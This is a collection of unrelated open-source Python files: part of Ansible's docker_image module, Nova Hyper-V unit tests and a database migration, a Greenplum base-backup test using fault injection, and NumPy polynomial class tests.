image_name = "%s:%s" % (self.name, self.tag)
self.log("Building image %s" % image_name)
self.results['actions'].append("Built image %s from %s" % (image_name, self.path))
self.results['changed'] = True
if not self.check_mode:
self.results['image'] = self.build_image()
elif self.load_path:
# Load the image from an archive
if not os.path.isfile(self.load_path):
self.fail("Error loading image %s. Specified path %s does not exist." % (self.name,
self.load_path))
image_name = self.name
if self.tag:
image_name = "%s:%s" % (self.name, self.tag)
self.results['actions'].append("Loaded image %s from %s" % (image_name, self.load_path))
self.results['changed'] = True
if not self.check_mode:
self.results['image'] = self.load_image()
else:
# pull the image
self.results['actions'].append('Pulled image %s:%s' % (self.name, self.tag))
self.results['changed'] = True
if not self.check_mode:
self.results['image'] = self.client.pull_image(self.name, tag=self.tag)
if self.archive_path:
self.archive_image(self.name, self.tag)
if self.push and not self.repository:
self.push_image(self.name, self.tag)
elif self.repository:
self.tag_image(self.name, self.tag, self.repository, force=self.force, push=self.push)
def absent(self):
'''
Handles state = 'absent', which removes an image.
:return None
'''
image = self.client.find_image(self.name, self.tag)
if image:
name = self.name
if self.tag:
name = "%s:%s" % (self.name, self.tag)
if not self.check_mode:
try:
self.client.remove_image(name, force=self.force)
except Exception as exc:
self.fail("Error removing image %s - %s" % (name, str(exc)))
self.results['changed'] = True
self.results['actions'].append("Removed image %s" % (name))
self.results['image']['state'] = 'Deleted'
def archive_image(self, name, tag):
'''
Archive an image to a .tar file. Called when archive_path is passed.
:param name - name of the image. Type: str
:return None
'''
if not tag:
tag = "latest"
image = self.client.find_image(name=name, tag=tag)
if not image:
self.log("archive image: image %s:%s not found" % (name, tag))
return
image_name = "%s:%s" % (name, tag)
self.results['actions'].append('Archived image %s to %s' % (image_name, self.archive_path))
self.results['changed'] = True
if not self.check_mode:
self.log("Getting archive of image %s" % image_name)
try:
image = self.client.get_image(image_name)
except Exception as exc:
self.fail("Error getting image %s - %s" % (image_name, str(exc)))
try:
image_tar = open(self.archive_path, 'w')
image_tar.write(image.data)
image_tar.close()
except Exception as exc:
self.fail("Error writing image archive %s - %s" % (self.archive_path, str(exc)))
image = self.client.find_image(name=name, tag=tag)
if image:
self.results['image'] = image
def push_image(self, name, tag=None):
'''
If the name of the image contains a repository path, then push the image.
        :param name: name of the image to push.
        :param tag: use a specific tag.
        :return: None
'''
repository = name
if not tag:
repository, tag = parse_repository_tag(name)
registry, repo_name = resolve_repository_name(repository)
self.log("push %s to %s/%s:%s" % (self.name, registry, repo_name, tag))
if registry:
self.results['actions'].append("Pushed image %s to %s/%s:%s" % (self.name, registry, repo_name, tag))
self.results['changed'] = True
if not self.check_mode:
status = None
try:
for line in self.client.push(repository, tag=tag, stream=True, decode=True):
self.log(line, pretty_print=True)
if line.get('errorDetail'):
raise Exception(line['errorDetail']['message'])
status = line.get('status')
except Exception as exc:
if re.search('unauthorized', str(exc)):
if re.search('authentication required', str(exc)):
self.fail("Error pushing image %s/%s:%s - %s. Try logging into %s first." %
(registry, repo_name, tag, str(exc), registry))
else:
self.fail("Error pushing image %s/%s:%s - %s. Does the repository exist?" %
(registry, repo_name, tag, str(exc)))
self.fail("Error pushing image %s: %s" % (repository, str(exc)))
self.results['image'] = self.client.find_image(name=repository, tag=tag)
if not self.results['image']:
self.results['image'] = dict()
self.results['image']['push_status'] = status
def tag_image(self, name, tag, repository, force=False, push=False):
'''
Tag an image into a repository.
:param name: name of the image. required.
:param tag: image tag.
:param repository: path to the repository. required.
        :param force: bool. force tagging, even if the image already exists with the repository path.
:param push: bool. push the image once it's tagged.
:return: None
'''
repo, repo_tag = parse_repository_tag(repository)
if not repo_tag:
repo_tag = "latest"
if tag:
repo_tag = tag
image = self.client.find_image(name=repo, tag=repo_tag)
found = 'found' if image else 'not found'
self.log("image %s was %s" % (repo, found))
if not image or force:
self.log("tagging %s:%s to %s:%s" % (name, tag, repo, repo_tag))
self.results['changed'] = True
self.results['actions'].append("Tagged image %s:%s to %s:%s" % (name, tag, repo, repo_tag))
if not self.check_mode:
try:
                    # Finding the image does not always work, especially when running a
                    # local registry. In those cases, if we don't set force=True, it errors.
image_name = name
if tag and not re.search(tag, name):
image_name = "%s:%s" % (name, tag)
tag_status = self.client.tag(image_name, repo, tag=repo_tag, force=True)
if not tag_status:
raise Exception("Tag operation failed.")
except Exception as exc:
self.fail("Error: failed to tag image - %s" % str(exc))
self.results['image'] = self.client.find_image(name=repo, tag=repo_tag)
if push:
self.push_image(repo, repo_tag)
def build_image(self):
'''
Build an image
:return: image dict
'''
params = dict(
path=self.path,
tag=self.name,
rm=self.rm,
nocache=self.nocache,
stream=True,
timeout=self.http_timeout,
pull=self.pull,
forcerm=self.rm,
dockerfile=self.dockerfile,
decode=True
)
if self.tag:
params['tag'] = "%s:%s" % (self.name, self.tag)
if self.container_limits:
params['container_limits'] = self.container_limits
if self.buildargs:
for key, value in self.buildargs.items():
if not isinstance(value, basestring):
self.buildargs[key] = str(value)
params['buildargs'] = self.buildargs
for line in self.client.build(**params):
# line = json.loads(line)
self.log(line, pretty_print=True)
if line.get('error'):
if line.get('errorDetail'):
errorDetail = line.get('errorDetail')
self.fail("Error building %s - code: %s message: %s" % (self.name,
errorDetail.get('code'),
errorDetail.get('message')))
else:
self.fail("Error building %s - %s" % (self.name, line.get('error')))
return self.client.find_image(name=self.name, tag=self.tag)
def load_image(self):
'''
Load an image from a .tar archive
:return: image dict
'''
try:
self.log("Opening image %s" % self.load_path)
            image_tar = open(self.load_path, 'rb')
except Exception as exc:
self.fail("Error opening image %s - %s" % (self.load_path, str(exc)))
try:
self.log("Loading image from %s" % self.load_path)
self.client.load_image(image_tar)
except Exception as exc:
self.fail("Error loading image %s - %s" % (self.name, str(exc)))
try:
image_tar.close()
except Exception as exc:
self.fail("Error closing image %s - %s" % (self.name, str(exc)))
return self.client.find_image(self.name, self.tag)
def main():
argument_spec = dict(
archive_path=dict(type='path'),
container_limits=dict(type='dict'),
dockerfile=dict(type='str'),
force=dict(type='bool', default=False),
http_timeout=dict(type='int'),
load_path=dict(type='path'),
name=dict(type='str', required=True),
        nocache=dict(type='bool', default=False),
path=dict(type='path', aliases=['build_path']),
pull=dict(type='bool', default=True),
push=dict(type='bool', default=False),
repository=dict(type='str'),
rm=dict(type='bool', default=True),
state=dict(type='str', choices=['absent', 'present', 'build'], default='present'),
tag=dict(type='str', default='latest'),
use_tls=dict(type='str', default='no', choices=['no', 'encrypt', 'verify']),
buildargs=dict(type='dict', default=None),
)
client = AnsibleDockerClient(
argument_spec=argument_spec,
supports_check_mode=True,
)
results = dict(
changed=False,
actions=[],
image={}
)
ImageManager(client, results)
client.module.exit_json(**results)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
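# Illustrative usage sketch (not part of this file; examples for Ansible
# modules normally live in DOCUMENTATION/EXAMPLES strings). A hypothetical
# playbook task, shown here as a comment:
#
#     - name: Build an image from a local build directory
#       docker_image:
#         path: /tmp/app                      # hypothetical path
#         name: registry.example.com/app      # hypothetical repository
#         tag: v1
#         push: yes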
| ColOfAbRiX/ansible | lib/ansible/modules/cloud/docker/docker_image.py | Python | gpl-3.0 | 21,614 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova import test
from nova.virt.hyperv import vmutils
class VMUtilsTestCase(test.NoDBTestCase):
"""Unit tests for the Hyper-V VMUtils class."""
_FAKE_VM_NAME = 'fake_vm'
_FAKE_MEMORY_MB = 2
_FAKE_VM_PATH = "fake_vm_path"
def setUp(self):
self._vmutils = vmutils.VMUtils()
self._vmutils._conn = mock.MagicMock()
super(VMUtilsTestCase, self).setUp()
def test_enable_vm_metrics_collection(self):
self.assertRaises(NotImplementedError,
self._vmutils.enable_vm_metrics_collection,
self._FAKE_VM_NAME)
def _lookup_vm(self):
mock_vm = mock.MagicMock()
self._vmutils._lookup_vm_check = mock.MagicMock(
return_value=mock_vm)
mock_vm.path_.return_value = self._FAKE_VM_PATH
return mock_vm
def test_set_vm_memory_static(self):
self._test_set_vm_memory_dynamic(1.0)
def test_set_vm_memory_dynamic(self):
self._test_set_vm_memory_dynamic(2.0)
def _test_set_vm_memory_dynamic(self, dynamic_memory_ratio):
mock_vm = self._lookup_vm()
mock_s = self._vmutils._conn.Msvm_VirtualSystemSettingData()[0]
mock_s.SystemType = 3
mock_vmsetting = mock.MagicMock()
mock_vmsetting.associators.return_value = [mock_s]
self._vmutils._modify_virt_resource = mock.MagicMock()
self._vmutils._set_vm_memory(mock_vm, mock_vmsetting,
self._FAKE_MEMORY_MB,
dynamic_memory_ratio)
self._vmutils._modify_virt_resource.assert_called_with(
mock_s, self._FAKE_VM_PATH)
if dynamic_memory_ratio > 1:
self.assertTrue(mock_s.DynamicMemoryEnabled)
else:
self.assertFalse(mock_s.DynamicMemoryEnabled)
| ntt-sic/nova | nova/tests/virt/hyperv/test_vmutils.py | Python | apache-2.0 | 2,546 |
# Copyright 2011 OpenStack LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import Column, Integer, MetaData, String, Table
meta = MetaData()
# Table stub-definitions
# Just for the ForeignKey and column creation to succeed, these are not the
# actual definitions of instances or services.
#
fixed_ips = Table(
"fixed_ips",
meta,
Column(
"id",
Integer(),
primary_key=True,
nullable=False))
#
# New Tables
#
# None
#
# Tables to alter
#
# None
#
# Columns to add to existing tables
#
fixed_ips_addressV6 = Column(
"addressV6",
String(
length=255,
convert_unicode=False,
assert_unicode=None,
unicode_error=None,
_warn_on_bytestring=False))
fixed_ips_netmaskV6 = Column(
"netmaskV6",
String(
length=3,
convert_unicode=False,
assert_unicode=None,
unicode_error=None,
_warn_on_bytestring=False))
fixed_ips_gatewayV6 = Column(
"gatewayV6",
String(
length=255,
convert_unicode=False,
assert_unicode=None,
unicode_error=None,
_warn_on_bytestring=False))
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine;
# bind migrate_engine to your metadata
meta.bind = migrate_engine
# Add columns to existing tables
fixed_ips.create_column(fixed_ips_addressV6)
fixed_ips.create_column(fixed_ips_netmaskV6)
fixed_ips.create_column(fixed_ips_gatewayV6)
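# Illustrative sketch (not part of the original migration): a matching
# downgrade would drop the same three columns, reusing the Column objects
# defined above.
def downgrade(migrate_engine):
    meta.bind = migrate_engine
    fixed_ips.drop_column(fixed_ips_addressV6)
    fixed_ips.drop_column(fixed_ips_netmaskV6)
    fixed_ips.drop_column(fixed_ips_gatewayV6)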
| nii-cloud/dodai-compute | nova/db/sqlalchemy/migrate_repo/versions/007_add_ipv6_to_fixed_ips.py | Python | apache-2.0 | 2,067 |
#!/usr/bin/env python
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from gppylib.commands.base import Command
from gppylib.db import dbconn
from tinctest import logger
from mpp.lib.PSQL import PSQL
from mpp.models import MPPTestCase
from mpp.gpdb.tests.storage.walrepl import lib as walrepl
import mpp.gpdb.tests.storage.walrepl.run
import os
import shutil
import subprocess
class basebackup_cases(mpp.gpdb.tests.storage.walrepl.run.StandbyRunMixin, MPPTestCase):
def tearDown(self):
super(basebackup_cases, self).tearDown()
self.reset_fault('base_backup_post_create_checkpoint')
def run_gpfaultinjector(self, fault_type, fault_name):
cmd_str = 'gpfaultinjector -s 1 -y {0} -f {1}'.format(
fault_type, fault_name)
cmd = Command(cmd_str, cmd_str)
cmd.run()
return cmd.get_results()
def resume(self, fault_name):
return self.run_gpfaultinjector('resume', fault_name)
def suspend_at(self, fault_name):
return self.run_gpfaultinjector('suspend', fault_name)
def reset_fault(self, fault_name):
return self.run_gpfaultinjector('reset', fault_name)
def fault_status(self, fault_name):
return self.run_gpfaultinjector('status', fault_name)
def wait_triggered(self, fault_name):
search = "fault injection state:'triggered'"
for i in walrepl.polling(10, 3):
result = self.fault_status(fault_name)
stdout = result.stdout
if stdout.find(search) > 0:
return True
return False
def test_xlogcleanup(self):
"""
        Verify that xlog segments created while basebackup is dumping
        data do not get cleaned up.
"""
shutil.rmtree('base', True)
PSQL.run_sql_command('DROP table if exists foo')
# Inject fault at post checkpoint create (basebackup)
logger.info ('Injecting base_backup_post_create_checkpoint fault ...')
result = self.suspend_at(
'base_backup_post_create_checkpoint')
logger.info(result.stdout)
self.assertEqual(result.rc, 0, result.stdout)
# Now execute basebackup. It will be blocked due to the
# injected fault.
logger.info ('Perform basebackup with xlog & recovery.conf...')
pg_basebackup = subprocess.Popen(['pg_basebackup', '-x', '-R', '-D', 'base']
, stdout = subprocess.PIPE
, stderr = subprocess.PIPE)
# Give basebackup a moment to reach the fault &
# trigger it
logger.info('Check if suspend fault is hit ...')
triggered = self.wait_triggered(
'base_backup_post_create_checkpoint')
self.assertTrue(triggered, 'Fault was not triggered')
# Perform operations that causes xlog seg generation
logger.info ('Performing xlog seg generation ...')
count = 0
while (count < 10):
PSQL.run_sql_command('select pg_switch_xlog(); select pg_switch_xlog(); checkpoint;')
count = count + 1
# Resume basebackup
result = self.resume('base_backup_post_create_checkpoint')
logger.info(result.stdout)
self.assertEqual(result.rc, 0, result.stdout)
# Wait until basebackup end
logger.info('Waiting for basebackup to end ...')
sql = "SELECT count(*) FROM pg_stat_replication"
with dbconn.connect(dbconn.DbURL(), utility=True) as conn:
while (True):
curs = dbconn.execSQL(conn, sql)
results = curs.fetchall()
if (int(results[0][0]) == 0):
                    break
# Verify if basebackup completed successfully
# See if recovery.conf exists (Yes - Pass)
self.assertTrue(os.path.exists(os.path.join('base','recovery.conf')))
logger.info ('Found recovery.conf in the backup directory.')
logger.info ('Pass')
| edespino/gpdb | src/test/tinc/tincrepo/mpp/gpdb/tests/storage/walrepl/basebackup/test_xlog_cleanup.py | Python | apache-2.0 | 4,635 |
"""Test inter-conversion of different polynomial classes.
This tests the convert and cast methods of all the polynomial classes.
"""
import operator as op
from numbers import Number
import pytest
import numpy as np
from numpy.polynomial import (
Polynomial, Legendre, Chebyshev, Laguerre, Hermite, HermiteE)
from numpy.testing import (
assert_almost_equal, assert_raises, assert_equal, assert_,
)
from numpy.polynomial.polyutils import RankWarning
#
# fixtures
#
classes = (
Polynomial, Legendre, Chebyshev, Laguerre,
Hermite, HermiteE
)
classids = tuple(cls.__name__ for cls in classes)
@pytest.fixture(params=classes, ids=classids)
def Poly(request):
return request.param
#
# helper functions
#
random = np.random.random
def assert_poly_almost_equal(p1, p2, msg=""):
try:
assert_(np.all(p1.domain == p2.domain))
assert_(np.all(p1.window == p2.window))
assert_almost_equal(p1.coef, p2.coef)
except AssertionError:
msg = f"Result: {p1}\nTarget: {p2}"
raise AssertionError(msg)
#
# Test conversion methods that depend on combinations of two classes.
#
Poly1 = Poly
Poly2 = Poly
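# Binding the fixture under two extra names makes pytest treat Poly1 and Poly2
# as independent parametrized fixtures, so the two-class tests below run over
# the full cross product of polynomial classes.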
def test_conversion(Poly1, Poly2):
x = np.linspace(0, 1, 10)
coef = random((3,))
d1 = Poly1.domain + random((2,))*.25
w1 = Poly1.window + random((2,))*.25
p1 = Poly1(coef, domain=d1, window=w1)
d2 = Poly2.domain + random((2,))*.25
w2 = Poly2.window + random((2,))*.25
p2 = p1.convert(kind=Poly2, domain=d2, window=w2)
assert_almost_equal(p2.domain, d2)
assert_almost_equal(p2.window, w2)
assert_almost_equal(p2(x), p1(x))
def test_cast(Poly1, Poly2):
x = np.linspace(0, 1, 10)
coef = random((3,))
d1 = Poly1.domain + random((2,))*.25
w1 = Poly1.window + random((2,))*.25
p1 = Poly1(coef, domain=d1, window=w1)
d2 = Poly2.domain + random((2,))*.25
w2 = Poly2.window + random((2,))*.25
p2 = Poly2.cast(p1, domain=d2, window=w2)
assert_almost_equal(p2.domain, d2)
assert_almost_equal(p2.window, w2)
assert_almost_equal(p2(x), p1(x))
#
# test methods that depend on one class
#
def test_identity(Poly):
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
x = np.linspace(d[0], d[1], 11)
p = Poly.identity(domain=d, window=w)
assert_equal(p.domain, d)
assert_equal(p.window, w)
assert_almost_equal(p(x), x)
def test_basis(Poly):
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
p = Poly.basis(5, domain=d, window=w)
assert_equal(p.domain, d)
assert_equal(p.window, w)
assert_equal(p.coef, [0]*5 + [1])
def test_fromroots(Poly):
# check that requested roots are zeros of a polynomial
# of correct degree, domain, and window.
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
r = random((5,))
p1 = Poly.fromroots(r, domain=d, window=w)
assert_equal(p1.degree(), len(r))
assert_equal(p1.domain, d)
assert_equal(p1.window, w)
assert_almost_equal(p1(r), 0)
# check that polynomial is monic
pdom = Polynomial.domain
pwin = Polynomial.window
p2 = Polynomial.cast(p1, domain=pdom, window=pwin)
assert_almost_equal(p2.coef[-1], 1)
def test_bad_conditioned_fit(Poly):
x = [0., 0., 1.]
y = [1., 2., 3.]
# check RankWarning is raised
with pytest.warns(RankWarning) as record:
Poly.fit(x, y, 2)
assert record[0].message.args[0] == "The fit may be poorly conditioned"
def test_fit(Poly):
def f(x):
return x*(x - 1)*(x - 2)
x = np.linspace(0, 3)
y = f(x)
# check default value of domain and window
p = Poly.fit(x, y, 3)
assert_almost_equal(p.domain, [0, 3])
assert_almost_equal(p(x), y)
assert_equal(p.degree(), 3)
# check with given domains and window
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
p = Poly.fit(x, y, 3, domain=d, window=w)
assert_almost_equal(p(x), y)
assert_almost_equal(p.domain, d)
assert_almost_equal(p.window, w)
p = Poly.fit(x, y, [0, 1, 2, 3], domain=d, window=w)
assert_almost_equal(p(x), y)
assert_almost_equal(p.domain, d)
assert_almost_equal(p.window, w)
# check with class domain default
p = Poly.fit(x, y, 3, [])
assert_equal(p.domain, Poly.domain)
assert_equal(p.window, Poly.window)
p = Poly.fit(x, y, [0, 1, 2, 3], [])
assert_equal(p.domain, Poly.domain)
assert_equal(p.window, Poly.window)
# check that fit accepts weights.
w = np.zeros_like(x)
z = y + random(y.shape)*.25
w[::2] = 1
p1 = Poly.fit(x[::2], z[::2], 3)
p2 = Poly.fit(x, z, 3, w=w)
p3 = Poly.fit(x, z, [0, 1, 2, 3], w=w)
assert_almost_equal(p1(x), p2(x))
assert_almost_equal(p2(x), p3(x))
def test_equal(Poly):
p1 = Poly([1, 2, 3], domain=[0, 1], window=[2, 3])
p2 = Poly([1, 1, 1], domain=[0, 1], window=[2, 3])
p3 = Poly([1, 2, 3], domain=[1, 2], window=[2, 3])
p4 = Poly([1, 2, 3], domain=[0, 1], window=[1, 2])
assert_(p1 == p1)
assert_(not p1 == p2)
assert_(not p1 == p3)
assert_(not p1 == p4)
def test_not_equal(Poly):
p1 = Poly([1, 2, 3], domain=[0, 1], window=[2, 3])
p2 = Poly([1, 1, 1], domain=[0, 1], window=[2, 3])
p3 = Poly([1, 2, 3], domain=[1, 2], window=[2, 3])
p4 = Poly([1, 2, 3], domain=[0, 1], window=[1, 2])
assert_(not p1 != p1)
assert_(p1 != p2)
assert_(p1 != p3)
assert_(p1 != p4)
def test_add(Poly):
# This checks commutation, not numerical correctness
c1 = list(random((4,)) + .5)
c2 = list(random((3,)) + .5)
p1 = Poly(c1)
p2 = Poly(c2)
p3 = p1 + p2
assert_poly_almost_equal(p2 + p1, p3)
assert_poly_almost_equal(p1 + c2, p3)
assert_poly_almost_equal(c2 + p1, p3)
assert_poly_almost_equal(p1 + tuple(c2), p3)
assert_poly_almost_equal(tuple(c2) + p1, p3)
assert_poly_almost_equal(p1 + np.array(c2), p3)
assert_poly_almost_equal(np.array(c2) + p1, p3)
assert_raises(TypeError, op.add, p1, Poly([0], domain=Poly.domain + 1))
assert_raises(TypeError, op.add, p1, Poly([0], window=Poly.window + 1))
if Poly is Polynomial:
assert_raises(TypeError, op.add, p1, Chebyshev([0]))
else:
assert_raises(TypeError, op.add, p1, Polynomial([0]))
def test_sub(Poly):
# This checks commutation, not numerical correctness
c1 = list(random((4,)) + .5)
c2 = list(random((3,)) + .5)
p1 = Poly(c1)
p2 = Poly(c2)
p3 = p1 - p2
assert_poly_almost_equal(p2 - p1, -p3)
assert_poly_almost_equal(p1 - c2, p3)
assert_poly_almost_equal(c2 - p1, -p3)
assert_poly_almost_equal(p1 - tuple(c2), p3)
assert_poly_almost_equal(tuple(c2) - p1, -p3)
assert_poly_almost_equal(p1 - np.array(c2), p3)
assert_poly_almost_equal(np.array(c2) - p1, -p3)
assert_raises(TypeError, op.sub, p1, Poly([0], domain=Poly.domain + 1))
assert_raises(TypeError, op.sub, p1, Poly([0], window=Poly.window + 1))
if Poly is Polynomial:
assert_raises(TypeError, op.sub, p1, Chebyshev([0]))
else:
assert_raises(TypeError, op.sub, p1, Polynomial([0]))
def test_mul(Poly):
c1 = list(random((4,)) + .5)
c2 = list(random((3,)) + .5)
p1 = Poly(c1)
p2 = Poly(c2)
p3 = p1 * p2
assert_poly_almost_equal(p2 * p1, p3)
assert_poly_almost_equal(p1 * c2, p3)
assert_poly_almost_equal(c2 * p1, p3)
assert_poly_almost_equal(p1 * tuple(c2), p3)
assert_poly_almost_equal(tuple(c2) * p1, p3)
assert_poly_almost_equal(p1 * np.array(c2), p3)
assert_poly_almost_equal(np.array(c2) * p1, p3)
assert_poly_almost_equal(p1 * 2, p1 * Poly([2]))
assert_poly_almost_equal(2 * p1, p1 * Poly([2]))
assert_raises(TypeError, op.mul, p1, Poly([0], domain=Poly.domain + 1))
assert_raises(TypeError, op.mul, p1, Poly([0], window=Poly.window + 1))
if Poly is Polynomial:
assert_raises(TypeError, op.mul, p1, Chebyshev([0]))
else:
assert_raises(TypeError, op.mul, p1, Polynomial([0]))
def test_floordiv(Poly):
c1 = list(random((4,)) + .5)
c2 = list(random((3,)) + .5)
c3 = list(random((2,)) + .5)
p1 = Poly(c1)
p2 = Poly(c2)
p3 = Poly(c3)
p4 = p1 * p2 + p3
c4 = list(p4.coef)
assert_poly_almost_equal(p4 // p2, p1)
assert_poly_almost_equal(p4 // c2, p1)
assert_poly_almost_equal(c4 // p2, p1)
assert_poly_almost_equal(p4 // tuple(c2), p1)
assert_poly_almost_equal(tuple(c4) // p2, p1)
assert_poly_almost_equal(p4 // np.array(c2), p1)
assert_poly_almost_equal(np.array(c4) // p2, p1)
assert_poly_almost_equal(2 // p2, Poly([0]))
assert_poly_almost_equal(p2 // 2, 0.5*p2)
assert_raises(
TypeError, op.floordiv, p1, Poly([0], domain=Poly.domain + 1))
assert_raises(
TypeError, op.floordiv, p1, Poly([0], window=Poly.window + 1))
if Poly is Polynomial:
assert_raises(TypeError, op.floordiv, p1, Chebyshev([0]))
else:
assert_raises(TypeError, op.floordiv, p1, Polynomial([0]))
def test_truediv(Poly):
# true division is valid only if the denominator is a Number and
# not a python bool.
p1 = Poly([1,2,3])
p2 = p1 * 5
for stype in np.ScalarType:
if not issubclass(stype, Number) or issubclass(stype, bool):
continue
s = stype(5)
assert_poly_almost_equal(op.truediv(p2, s), p1)
assert_raises(TypeError, op.truediv, s, p2)
for stype in (int, float):
s = stype(5)
assert_poly_almost_equal(op.truediv(p2, s), p1)
assert_raises(TypeError, op.truediv, s, p2)
for stype in [complex]:
s = stype(5, 0)
assert_poly_almost_equal(op.truediv(p2, s), p1)
assert_raises(TypeError, op.truediv, s, p2)
for s in [tuple(), list(), dict(), bool(), np.array([1])]:
assert_raises(TypeError, op.truediv, p2, s)
assert_raises(TypeError, op.truediv, s, p2)
for ptype in classes:
assert_raises(TypeError, op.truediv, p2, ptype(1))
def test_mod(Poly):
# This checks commutation, not numerical correctness
c1 = list(random((4,)) + .5)
c2 = list(random((3,)) + .5)
c3 = list(random((2,)) + .5)
p1 = Poly(c1)
p2 = Poly(c2)
p3 = Poly(c3)
p4 = p1 * p2 + p3
c4 = list(p4.coef)
assert_poly_almost_equal(p4 % p2, p3)
assert_poly_almost_equal(p4 % c2, p3)
assert_poly_almost_equal(c4 % p2, p3)
assert_poly_almost_equal(p4 % tuple(c2), p3)
assert_poly_almost_equal(tuple(c4) % p2, p3)
assert_poly_almost_equal(p4 % np.array(c2), p3)
assert_poly_almost_equal(np.array(c4) % p2, p3)
assert_poly_almost_equal(2 % p2, Poly([2]))
assert_poly_almost_equal(p2 % 2, Poly([0]))
assert_raises(TypeError, op.mod, p1, Poly([0], domain=Poly.domain + 1))
assert_raises(TypeError, op.mod, p1, Poly([0], window=Poly.window + 1))
if Poly is Polynomial:
assert_raises(TypeError, op.mod, p1, Chebyshev([0]))
else:
assert_raises(TypeError, op.mod, p1, Polynomial([0]))
def test_divmod(Poly):
# This checks commutation, not numerical correctness
c1 = list(random((4,)) + .5)
c2 = list(random((3,)) + .5)
c3 = list(random((2,)) + .5)
p1 = Poly(c1)
p2 = Poly(c2)
p3 = Poly(c3)
p4 = p1 * p2 + p3
c4 = list(p4.coef)
quo, rem = divmod(p4, p2)
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(p4, c2)
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(c4, p2)
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(p4, tuple(c2))
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(tuple(c4), p2)
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(p4, np.array(c2))
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(np.array(c4), p2)
assert_poly_almost_equal(quo, p1)
assert_poly_almost_equal(rem, p3)
quo, rem = divmod(p2, 2)
assert_poly_almost_equal(quo, 0.5*p2)
assert_poly_almost_equal(rem, Poly([0]))
quo, rem = divmod(2, p2)
assert_poly_almost_equal(quo, Poly([0]))
assert_poly_almost_equal(rem, Poly([2]))
assert_raises(TypeError, divmod, p1, Poly([0], domain=Poly.domain + 1))
assert_raises(TypeError, divmod, p1, Poly([0], window=Poly.window + 1))
if Poly is Polynomial:
assert_raises(TypeError, divmod, p1, Chebyshev([0]))
else:
assert_raises(TypeError, divmod, p1, Polynomial([0]))
def test_roots(Poly):
d = Poly.domain * 1.25 + .25
w = Poly.window
tgt = np.linspace(d[0], d[1], 5)
res = np.sort(Poly.fromroots(tgt, domain=d, window=w).roots())
assert_almost_equal(res, tgt)
# default domain and window
res = np.sort(Poly.fromroots(tgt).roots())
assert_almost_equal(res, tgt)
def test_degree(Poly):
p = Poly.basis(5)
assert_equal(p.degree(), 5)
def test_copy(Poly):
p1 = Poly.basis(5)
p2 = p1.copy()
assert_(p1 == p2)
assert_(p1 is not p2)
assert_(p1.coef is not p2.coef)
assert_(p1.domain is not p2.domain)
assert_(p1.window is not p2.window)
def test_integ(Poly):
P = Polynomial
# Check defaults
p0 = Poly.cast(P([1*2, 2*3, 3*4]))
p1 = P.cast(p0.integ())
p2 = P.cast(p0.integ(2))
assert_poly_almost_equal(p1, P([0, 2, 3, 4]))
assert_poly_almost_equal(p2, P([0, 0, 1, 1, 1]))
# Check with k
p0 = Poly.cast(P([1*2, 2*3, 3*4]))
p1 = P.cast(p0.integ(k=1))
p2 = P.cast(p0.integ(2, k=[1, 1]))
assert_poly_almost_equal(p1, P([1, 2, 3, 4]))
assert_poly_almost_equal(p2, P([1, 1, 1, 1, 1]))
# Check with lbnd
p0 = Poly.cast(P([1*2, 2*3, 3*4]))
p1 = P.cast(p0.integ(lbnd=1))
p2 = P.cast(p0.integ(2, lbnd=1))
assert_poly_almost_equal(p1, P([-9, 2, 3, 4]))
assert_poly_almost_equal(p2, P([6, -9, 1, 1, 1]))
# Check scaling
d = 2*Poly.domain
p0 = Poly.cast(P([1*2, 2*3, 3*4]), domain=d)
p1 = P.cast(p0.integ())
p2 = P.cast(p0.integ(2))
assert_poly_almost_equal(p1, P([0, 2, 3, 4]))
assert_poly_almost_equal(p2, P([0, 0, 1, 1, 1]))
def test_deriv(Poly):
    # Check that the derivative is the inverse of integration. It
    # assumes that the integration has been checked elsewhere.
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
p1 = Poly([1, 2, 3], domain=d, window=w)
p2 = p1.integ(2, k=[1, 2])
p3 = p1.integ(1, k=[1])
assert_almost_equal(p2.deriv(1).coef, p3.coef)
assert_almost_equal(p2.deriv(2).coef, p1.coef)
# default domain and window
p1 = Poly([1, 2, 3])
p2 = p1.integ(2, k=[1, 2])
p3 = p1.integ(1, k=[1])
assert_almost_equal(p2.deriv(1).coef, p3.coef)
assert_almost_equal(p2.deriv(2).coef, p1.coef)
